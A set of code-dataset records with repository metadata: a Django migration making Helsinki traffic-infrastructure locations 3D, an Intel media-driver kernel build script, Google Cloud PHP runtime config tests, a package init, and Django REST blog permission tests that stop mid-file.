2022-03-02T13:13:20.000Z
|
traffic_control/migrations/0039_location_2d_to_3d.py
|
City-of-Helsinki/city-infrastructure-platform
|
c14513a9e54405412085f1047f91ec58b263eac0
|
[
"CC0-1.0"
] | 170
|
2019-12-31T13:37:04.000Z
|
2022-03-12T14:03:35.000Z
|
traffic_control/migrations/0039_location_2d_to_3d.py
|
City-of-Helsinki/city-infrastructure-platform
|
c14513a9e54405412085f1047f91ec58b263eac0
|
[
"CC0-1.0"
] | 3
|
2020-05-08T05:58:02.000Z
|
2022-03-15T16:07:25.000Z
|
# Generated by Django 2.2.16 on 2020-11-11 09:47
import django.contrib.gis.db.models.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("traffic_control", "0038_remove_plan_planner_legacy"),
]
operations = [
migrations.AlterField(
model_name="barrierplan",
name="location",
field=django.contrib.gis.db.models.fields.GeometryField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="barrierreal",
name="location",
field=django.contrib.gis.db.models.fields.GeometryField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="mountplan",
name="location",
field=django.contrib.gis.db.models.fields.GeometryField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="mountreal",
name="location",
field=django.contrib.gis.db.models.fields.GeometryField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="operationalarea",
name="location",
field=django.contrib.gis.db.models.fields.MultiPolygonField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="parkingarea",
name="location",
field=django.contrib.gis.db.models.fields.MultiPolygonField(
dim=3, srid=3879, verbose_name="location (3D)"
),
),
migrations.AlterField(
model_name="plan",
name="location",
field=django.contrib.gis.db.models.fields.MultiPolygonField(
blank=True, dim=3, null=True, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="roadmarkingplan",
name="location",
field=django.contrib.gis.db.models.fields.GeometryField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="roadmarkingreal",
name="location",
field=django.contrib.gis.db.models.fields.GeometryField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="signpostplan",
name="location",
field=django.contrib.gis.db.models.fields.PointField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="signpostreal",
name="location",
field=django.contrib.gis.db.models.fields.PointField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="trafficlightplan",
name="location",
field=django.contrib.gis.db.models.fields.PointField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
migrations.AlterField(
model_name="trafficlightreal",
name="location",
field=django.contrib.gis.db.models.fields.PointField(
dim=3, srid=3879, verbose_name="Location (3D)"
),
),
]
| 34.424528
| 85
| 0.543985
| 340
| 3,649
| 5.747059
| 0.170588
| 0.159672
| 0.114637
| 0.128966
| 0.810133
| 0.810133
| 0.79478
| 0.79478
| 0.79478
| 0.79478
| 0
| 0.040462
| 0.336257
| 3,649
| 105
| 86
| 34.752381
| 0.766309
| 0.012606
| 0
| 0.767677
| 1
| 0
| 0.131908
| 0.008609
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020202
| 0
| 0.050505
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7da37aa6c57f39c25d4b90faf6af7c1eb4ab7e01
| 4,275
|
py
|
Python
|
media_driver/agnostic/gen11_icllp/vp/kernel/build.py
|
sgnanase/media-driver
|
1f208215a091faa2cdd133acbe435c243b0eb317
|
[
"Intel",
"BSD-3-Clause",
"MIT"
] | 1
|
2021-04-08T08:40:21.000Z
|
2021-04-08T08:40:21.000Z
|
media_driver/agnostic/gen11_icllp/vp/kernel/build.py
|
sgnanase/media-driver
|
1f208215a091faa2cdd133acbe435c243b0eb317
|
[
"Intel",
"BSD-3-Clause",
"MIT"
] | 1
|
2019-01-05T02:54:19.000Z
|
2019-01-05T02:54:19.000Z
|
media_driver/agnostic/gen11_icllp/vp/kernel/build.py
|
sgnanase/media-driver
|
1f208215a091faa2cdd133acbe435c243b0eb317
|
[
"Intel",
"BSD-3-Clause",
"MIT"
] | 1
|
2018-01-12T06:07:55.000Z
|
2018-01-12T06:07:55.000Z
|
import os,shutil
import sys
import os
from sys import platform
class WinKernel2Source(object):
def __init__(self, component='vp'):
self.input_dir = '.\\'
self.bin_dir ='.\\compile'
self.component = 'vp'
self.bintool = 'GenKrnBin.exe'
self.sourcetool = 'KernelBinToSource.exe'
def iga_compile(self):
for filename in os.listdir('.\\Source'):
fp = os.path.join('.\\Source', filename)
fileext = os.path.splitext(filename)[1]
if os.path.isfile(fp) and 'asm' in fileext:
newfilename = os.path.splitext(filename)[0]
newfilename += '.krn'
newfp = os.path.join('.\\Source', newfilename)
command = '.\\compile\\IGA\\iga64.exe -p 11 -a '
command += fp
command += ' -o '
command += newfp;
os.system(command)
command_Hex = '.\\compile\\KrnToHex_IGA.exe '
command_Hex += newfp;
os.system(command_Hex)
hexfilename = os.path.splitext(filename)[0]
hexfilename += '.hex'
hexfp = os.path.join(".\\Source", hexfilename)
isExists=os.path.exists("component_release")
if not isExists:
os.mkdir("component_release")
shutil.copy(hexfp, "component_release")
os.remove(newfp)
os.remove(hexfp)
print("Compiled %s" % fp);
def kernel2bin(self):
cmd = '.\\compile\\GenKrnBin.exe component_release vp'
os.system(cmd)
def bin2source(self):
cmd = '.\\compile\\KernelBinToSource.exe -i .\\component_release\\igvpkrn_g11_icllp.bin -o .\\'
os.system(cmd)
os.remove(r'..\\..\\..\\common\\vp\\kernel\\vpkrnheader.h')
os.rename('.\\component_release\\igvpkrn_g11_icllp.h', '..\\..\\..\\common\\vp\\kernel\\vpkrnheader.h')
os.remove(r'.\\component_release\\igvpkrn_g11_icllp.bin')
class LinuxKernel2Source(object):
def __init__(self, component='vp'):
self.input_dir = './'
self.bin_dir ='./compile'
self.component = 'vp'
self.bintool = 'GenKrnBin'
self.sourcetool = 'KernelBinToSource'
def iga_compile(self):
for filename in os.listdir('./Source'):
fp = os.path.join('./Source', filename)
fileext = os.path.splitext(filename)[1]
if os.path.isfile(fp) and 'asm' in fileext:
newfilename = os.path.splitext(filename)[0]
newfilename += '.krn'
newfp = os.path.join('./Source', newfilename)
command = './compile/IGA/iga64.exe -p 11 -a '
command += fp
command += ' -o '
command += newfp;
os.system(command)
command_Hex = './compile/KrnToHex_IGA '
command_Hex += newfp;
os.system(command_Hex)
print 'test'
hexfilename = os.path.splitext(filename)[0]
hexfilename += '.hex'
hexfp = os.path.join("./Source", hexfilename)
isExists=os.path.exists("component_release")
if not isExists:
os.mkdir("component_release")
shutil.copy(hexfp, "component_release")
os.remove(newfp)
os.remove(hexfp)
print("Compiled %s" % fp);
def kernel2bin(self):
cmd = './compile/GenKrnBin component_release vp'
os.system(cmd)
def bin2source(self):
cmd = './compile/KernelBinToSource -i ./component_release/igvpkrn_g11_icllp.bin -o ./'
os.system(cmd)
os.remove(r'../../../common/vp/kernel/vpkrnheader.h')
os.rename('./component_release/igvpkrn_g11_icllp.h', '../../../common/vp/kernel/vpkrnheader.h')
os.remove(r'./component_release/igvpkrn_g11_icllp.bin')
def main():
if platform == "linux" or platform == "linux2":
k2s = LinuxKernel2Source()
else:
k2s = WinKernel2Source()
k2s.iga_compile()
k2s.kernel2bin()
k2s.bin2source()
if __name__=='__main__':
main()
| 33.661417
| 111
| 0.538012
| 440
| 4,275
| 5.097727
| 0.195455
| 0.0428
| 0.02675
| 0.0428
| 0.858671
| 0.858671
| 0.858671
| 0.829247
| 0.829247
| 0.829247
| 0
| 0.014458
| 0.320468
| 4,275
| 126
| 112
| 33.928571
| 0.757659
| 0
| 0
| 0.525253
| 0
| 0
| 0.243509
| 0.145263
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.040404
| null | null | 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7db6884a047ab7929af2940d8df8419076e307d9
| 9,763
|
py
|
Python
|
google-cloud-sdk/platform/ext-runtime/php/test/runtime_test.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | 1
|
2017-11-29T18:52:27.000Z
|
2017-11-29T18:52:27.000Z
|
google-cloud-sdk/.install/.backup/platform/ext-runtime/php/test/runtime_test.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | null | null | null |
google-cloud-sdk/.install/.backup/platform/ext-runtime/php/test/runtime_test.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | 1
|
2020-07-25T12:09:01.000Z
|
2020-07-25T12:09:01.000Z
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import textwrap
import unittest
from gae_ext_runtime import testutil
RUNTIME_DEF_ROOT = os.path.dirname(os.path.dirname(__file__))
class RuntimeTestCase(testutil.TestBase):
"""Tests for the PHP external runtime fingerprinter."""
def license(self):
return textwrap.dedent('''\
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''')
def preamble(self):
return textwrap.dedent('''\
# Dockerfile extending the generic PHP image with application files for a
# single application.
FROM gcr.io/google_appengine/php:latest
# The Docker image will configure the document root according to this
# environment variable.
''')
def setUp(self):
self.runtime_def_root = RUNTIME_DEF_ROOT
super(RuntimeTestCase, self).setUp()
def file_contents(self, filename):
with open(self.full_path(filename)) as f:
return f.read()
def test_generate_without_php_files(self):
self.write_file('index.html', 'index')
self.assertFalse(self.generate_configs())
self.assertFalse(os.path.exists(self.full_path('app.yaml')))
self.assertFalse(os.path.exists(self.full_path('Dockerfile')))
self.assertFalse(os.path.exists(self.full_path('.dockerignore')))
def test_generate_with_php_files(self):
self.write_file('index.php', 'index')
self.generate_configs()
app_yaml = self.file_contents('app.yaml')
self.assertIn('runtime: php\n', app_yaml)
self.assertIn('env: flex\n', app_yaml)
self.assertIn('runtime_config:\n document_root: .\n', app_yaml)
self.assertFalse(os.path.exists(self.full_path('Dockerfile')))
self.assertFalse(os.path.exists(self.full_path('.dockerignore')))
def test_generate_with_php_files_no_write(self):
"""Test generate_config_data with a .php file.
Checks app.yaml contents, app.yaml is written to disk, and
Dockerfile and .dockerignore not in the directory.
"""
self.write_file('index.php', 'index')
self.generate_config_data()
app_yaml = self.file_contents('app.yaml')
self.assertIn('runtime: php\n', app_yaml)
self.assertIn('env: flex\n', app_yaml)
self.assertIn('runtime_config:\n document_root: .\n', app_yaml)
self.assertFalse(os.path.exists(self.full_path('Dockerfile')))
self.assertFalse(os.path.exists(self.full_path('.dockerignore')))
def test_generate_custom_runtime(self):
self.write_file('index.php', 'index')
self.generate_configs(custom=True)
dockerfile = self.file_contents('Dockerfile')
self.assertEqual(dockerfile, self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app
'''))
self.assert_file_exists_with_contents(
'.dockerignore',
self.license() + textwrap.dedent('''\
.dockerignore
Dockerfile
.git
.hg
.svn
'''))
def test_generate_custom_runtime_no_write(self):
"""Tests generate_config_data with custom runtime."""
self.write_file('index.php', 'index')
cfg_files = self.generate_config_data(custom=True)
self.assert_genfile_exists_with_contents(
cfg_files,
'Dockerfile',
self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app
'''))
self.assert_genfile_exists_with_contents(
cfg_files,
'.dockerignore',
self.license() + textwrap.dedent('''\
.dockerignore
Dockerfile
.git
.hg
.svn
'''))
def test_generate_with_deploy(self):
self.write_file('index.php', 'index')
self.generate_configs(deploy=True)
dockerfile = self.file_contents('Dockerfile')
self.assertEqual(dockerfile, textwrap.dedent('''\
# Dockerfile extending the generic PHP image with application files for a
# single application.
FROM gcr.io/google_appengine/php:latest
# The Docker image will configure the document root according to this
# environment variable.
ENV DOCUMENT_ROOT /app
'''))
dockerignore = self.file_contents('.dockerignore')
self.assertEqual(dockerignore, self.license() + textwrap.dedent('''\
.dockerignore
Dockerfile
.git
.hg
.svn
'''))
def test_generate_with_deploy_no_write(self):
"""Tests generate_config_data with deploy=True."""
self.write_file('index.php', 'index')
cfg_files = self.generate_config_data(deploy=True)
self.assert_genfile_exists_with_contents(
cfg_files,
'Dockerfile',
self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app
'''))
self.assert_genfile_exists_with_contents(
cfg_files,
'.dockerignore',
self.license() + textwrap.dedent('''\
.dockerignore
Dockerfile
.git
.hg
.svn
'''))
def test_generate_with_existing_appinfo(self):
self.write_file('index.php', 'index')
appinfo = testutil.AppInfoFake(
runtime_config={'document_root': 'wordpress'},
entrypoint='["/bin/bash", "my-cmd.sh"]')
self.generate_configs(deploy=True, appinfo=appinfo)
dockerfile = self.file_contents('Dockerfile')
self.assertEqual(dockerfile, self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app/wordpress
# Allow custom CMD
CMD ["/bin/bash", "my-cmd.sh"]
'''))
dockerignore = self.file_contents('.dockerignore')
self.assertEqual(dockerignore, self.license() + textwrap.dedent('''\
.dockerignore
Dockerfile
.git
.hg
.svn
'''))
def test_generate_with_existing_appinfo_no_write(self):
"""Tests generate_config_data with fake appinfo."""
self.write_file('index.php', 'index')
appinfo = testutil.AppInfoFake(
runtime_config={'document_root': 'wordpress'},
entrypoint='["/bin/bash", "my-cmd.sh"]')
cfg_files = self.generate_config_data(deploy=True, appinfo=appinfo)
self.assert_genfile_exists_with_contents(
cfg_files,
'Dockerfile',
self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app/wordpress
# Allow custom CMD
CMD ["/bin/bash", "my-cmd.sh"]
'''))
self.assert_genfile_exists_with_contents(
cfg_files,
'.dockerignore',
self.license() + textwrap.dedent('''\
.dockerignore
Dockerfile
.git
.hg
.svn
'''))
def test_generate_with_array_entrypoint(self):
self.write_file('index.php', 'index')
appinfo = testutil.AppInfoFake(
runtime_config={'document_root': 'wordpress'},
entrypoint=['/bin/bash', 'my-cmd.sh'])
self.generate_configs(deploy=True, appinfo=appinfo)
dockerfile = self.file_contents('Dockerfile')
self.assertEqual(dockerfile, self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app/wordpress
# Allow custom CMD
CMD ["/bin/bash", "my-cmd.sh"]
'''))
def test_generate_with_array_entrypoint_no_write(self):
"""Tests generate_config_data with an array entrypoint."""
self.write_file('index.php', 'index')
appinfo = testutil.AppInfoFake(
runtime_config={'document_root': 'wordpress'},
entrypoint=["/bin/bash", "my-cmd.sh"])
cfg_files = self.generate_config_data(deploy=True, appinfo=appinfo)
self.assert_genfile_exists_with_contents(
cfg_files,
'Dockerfile',
self.preamble() + textwrap.dedent('''\
ENV DOCUMENT_ROOT /app/wordpress
# Allow custom CMD
CMD ["/bin/bash", "my-cmd.sh"]
'''))
if __name__ == '__main__':
unittest.main()
| 34.992832
| 86
| 0.601454
| 1,067
| 9,763
| 5.31865
| 0.156514
| 0.044405
| 0.029075
| 0.03489
| 0.866608
| 0.860969
| 0.852335
| 0.847048
| 0.805639
| 0.79348
| 0
| 0.002305
| 0.289051
| 9,763
| 278
| 87
| 35.118705
| 0.8153
| 0.100686
| 0
| 0.742718
| 0
| 0
| 0.400184
| 0.007806
| 0
| 0
| 0
| 0
| 0.135922
| 1
| 0.072816
| false
| 0
| 0.019417
| 0.009709
| 0.11165
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dcb7da5acf5d9749cb923481498f89aabb36dc3
| 111
|
py
|
Python
|
IPToolz/__init__.py
|
moriire/IPToolz
|
a23cf0c9076aefdab6e54c25f2986a99fe6e014e
|
[
"MIT"
] | 1
|
2020-07-28T12:47:46.000Z
|
2020-07-28T12:47:46.000Z
|
IPToolz/__init__.py
|
moriire/IPToolz
|
a23cf0c9076aefdab6e54c25f2986a99fe6e014e
|
[
"MIT"
] | null | null | null |
IPToolz/__init__.py
|
moriire/IPToolz
|
a23cf0c9076aefdab6e54c25f2986a99fe6e014e
|
[
"MIT"
] | null | null | null |
from IPToolz.CBit.mo import MBit as Toolz
from IPToolz.CBit.errors import *
from IPToolz.IPToolz import *
| 27.75
| 42
| 0.765766
| 17
| 111
| 5
| 0.529412
| 0.388235
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171171
| 111
| 3
| 43
| 37
| 0.923913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
81787ef8a2c85cf00e70e870268726852903f90d
| 22,400
|
py
|
Python
|
docker/app/app/backend/apps/blog/test_views.py
|
JTarball/tetherbox
|
cae7a4bb6e29da0f34670f8c8d228faf5f909f3a
|
[
"0BSD"
] | null | null | null |
docker/app/app/backend/apps/blog/test_views.py
|
JTarball/tetherbox
|
cae7a4bb6e29da0f34670f8c8d228faf5f909f3a
|
[
"0BSD"
] | null | null | null |
docker/app/app/backend/apps/blog/test_views.py
|
JTarball/tetherbox
|
cae7a4bb6e29da0f34670f8c8d228faf5f909f3a
|
[
"0BSD"
] | null | null | null |
"""
blog.test_views.py
==================
Test Views for Blog App
"""
import logging
import datetime
from django.core.urlresolvers import reverse
from django_dynamic_fixture import G
from rest_framework import status
from rest_framework.test import APIClient, APITestCase
from accounts.models import AccountsUser
from blog.models import Post
from blog.serializers import PostSerializer
logger = logging.getLogger('test_logger')
class TestPostList(APITestCase):
def setUp(self):
self.user = G(AccountsUser, is_superuser=False, is_staff=False)
self.staff = G(AccountsUser, is_superuser=False, is_staff=True)
self.superadmin = G(AccountsUser, is_superuser=True, is_staff=True)
self.superadmin_not_staff = G(AccountsUser, is_superuser=True, is_staff=False)
self.client = APIClient()
self.url = reverse('blog:list')
def test_create_post_pass_permissions_superadmin(self):
""" Test creation of post for superadmin. """
# Create Post, change slug (has to be unique) so can use it for post
post = G(Post, author=self.user)
count = Post.objects.count()
post.slug = 'different-slug'
serializer = PostSerializer(post)
# Force Authentication and Post
self.client.force_authenticate(user=self.superadmin)
response = self.client.post(self.url, serializer.data, format='json')
# Basic check: slug is the same, created & object count increased
self.assertEquals(response.status_code, status.HTTP_201_CREATED, "%s" % response.data)
self.assertEquals(Post.objects.count(), count + 1)
self.assertEquals(response.data['slug'], post.slug, response.data)
def test_create_post_pass_permissions_staff(self):
""" Test create permissions for staff. """
# Testing permissions don't care about data so just generate it first
post = G(Post, author=self.user)
count = Post.objects.count()
post.slug = 'different-slug'
serializer = PostSerializer(post)
# Force Authentication and Post
self.client.force_authenticate(user=self.staff)
response = self.client.post(self.url, serializer.data, format='json')
# Basic check: slug is the same, created & object count increased
self.assertEquals(response.status_code, status.HTTP_201_CREATED)
self.assertEquals(Post.objects.count(), count + 1)
self.assertEquals(response.data['slug'], post.slug)
def test_create_post_pass_permissions_superadmin_not_staff(self):
""" Test create permissions for a superadmin who is not staff. """
# Testing permissions don't care about data so just generate it first
post = G(Post, author=self.user)
count = Post.objects.count()
post.slug = 'different-slug'
serializer = PostSerializer(post)
# Force Authentication and Post
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.post(self.url, serializer.data, format='json')
# Basic check: slug is the same, created & object count increased
self.assertEquals(response.status_code, status.HTTP_201_CREATED)
self.assertEquals(Post.objects.count(), count + 1)
self.assertEquals(response.data['slug'], post.slug)
def test_create_post_fail_permissions_user(self):
""" Test create permissions fail for authenticated users - posts can only be created by staff/superadmin. """
# Testing permissions don't care about data so just generate it first
post = G(Post, author=self.user)
count = Post.objects.count()
serializer = PostSerializer(post)
# Force Authentication and Post
self.client.force_authenticate(user=self.user)
response = self.client.post(self.url, serializer.data, format='json')
# Basic check: slug is the same, created & object count increased
self.assertEquals(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEquals(Post.objects.count(), count)
self.assertEquals(Post.objects.get(pk=post.pk).slug, post.slug)
def test_get_published_posts_anonymous_user(self):
""" Tests getting a list of published posts only for anonymous users. """
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=False)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 3, "The list of posts retrieved should only include published ")
def test_get_published_posts_normal_authenticated_user(self):
""" Tests getting a list of published posts only for authenticated users. """
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=False)
self.client.force_authenticate(user=self.user)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 3, "The list of posts retrieved should only include published ")
def test_get_all_posts_superadmin(self):
""" Test getting a list of all posts for superadmins. """
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=False)
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 4, "The method should retrieve all posts (published & not published).")
def test_get_all_posts_staff(self):
""" Tests getting a list of all posts for staff users. """
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=False)
self.client.force_authenticate(user=self.staff)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 4, "The method should retrieve all posts (published & not published).")
class TestPostListByYear(APITestCase):
def setUp(self):
self.user = G(AccountsUser, is_superuser=False, is_staff=False)
self.staff = G(AccountsUser, is_superuser=False, is_staff=True)
self.superadmin = G(AccountsUser, is_superuser=True, is_staff=True)
self.superadmin_not_staff = G(AccountsUser, is_superuser=True, is_staff=False)
self.client = APIClient()
self.year = "%s" % datetime.datetime.now().year
self.url = reverse('blog:list_year', kwargs={'year': self.year})
def test_post_posts_forbidden_normal_user(self):
""" Test post action is forbidden for an normal user. """
G(Post, author=self.user, published=True, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
# Force Authentication and Post
self.client.force_authenticate(user=self.user)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
response = self.client.post(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_403_FORBIDDEN)
def test_put_posts_forbidden(self):
""" Test all posts are retrieved for anonymous user. """
G(Post, author=self.user, published=True, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
response = self.client.put(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_get_published_posts_by_year(self):
""" Test published posts are retrieved. """
G(Post, author=self.user, published=False, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 2)
class TestPostListByUser(APITestCase):
def setUp(self):
self.user = G(AccountsUser, is_superuser=False, is_staff=False)
self.staff = G(AccountsUser, is_superuser=False, is_staff=True)
self.client = APIClient()
self.url = reverse('blog:list_user', kwargs={'user': self.user})
def test_posts_patch_method_not_allowed(self):
""" Tests list_user is not allowed for patch method. """
G(Post, author=self.user, published=True, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.patch(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_posts_post_method_not_allowed(self):
""" Tests list_user is not allowed for post method. """
G(Post, author=self.user, published=True, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.post(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_posts_put_method_not_allowed(self):
""" Tests list_user is not allowed for put method. """
G(Post, author=self.user, published=True, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.put(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_get_posts_live_by_user_staff(self):
""" Test all posts for a specific author are returned for staff. """
G(Post, author=self.user, published=False, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
self.client.force_authenticate(user=self.staff)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 3)
def test_get_posts_by_user(self):
""" Test published posts for a specific author are returned for anonymous users. """
G(Post, author=self.user, published=False, updated_at=datetime.date(2014, 3, 13))
G(Post, author=self.user, published=True)
G(Post, author=self.user, published=True)
logger.info("%s" % self.url)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 2)
class TestPostListByTag(APITestCase):
def setUp(self):
self.user = G(AccountsUser, is_superuser=False, is_staff=False)
self.staff = G(AccountsUser, is_superuser=False, is_staff=True)
self.tag = 'tag1'
self.client = APIClient()
self.url = reverse('blog:list_tag', kwargs={'tag': self.tag})
def test_posts_patch_method_not_allowed(self):
""" Tests list_tag is not allowed for patch method. """
G(Post, author=self.user, published=True, tags=[self.tag])
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.patch(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_post_post_method_not_allowed(self):
""" Tests list_tag is not allowed for post method. """
G(Post, author=self.user, published=True, tags=[self.tag])
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.post(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_posts_put_method_not_allowed(self):
""" Tests list_tag is not allowed for put method. """
G(Post, author=self.user, published=True, tags=[self.tag])
G(Post, author=self.user, published=True)
post = G(Post, author=self.user)
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.put(self.url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_get_posts_live_by_tag_staff(self):
""" Test all posts for a specific author are returned for staff. """
G(Post, author=self.user, published=False, tags=[self.tag])
G(Post, author=self.user, published=True, tags=[self.tag])
G(Post, author=self.user, published=True, tags=[self.tag])
self.client.force_authenticate(user=self.staff)
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 3)
def test_get_posts_by_tag(self):
""" Test published posts for a specific author are returned for anonymous users. """
G(Post, author=self.user, published=False, tags=[self.tag])
G(Post, author=self.user, published=True, tags=[self.tag])
G(Post, author=self.user, published=True, tags=[self.tag])
response = self.client.get(self.url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(len(response.data), 2)
class TestPostDetail(APITestCase):
def setUp(self):
self.user = G(AccountsUser, is_superuser=False, is_staff=False)
self.staff = G(AccountsUser, is_superuser=False, is_staff=True)
self.superadmin = G(AccountsUser, is_superuser=True, is_staff=True)
self.superadmin_not_staff = G(AccountsUser, is_superuser=True, is_staff=False)
self.client = APIClient()
def test_patch_fail_post_user(self):
""" Tests patch method is forbidden for a normal user. """
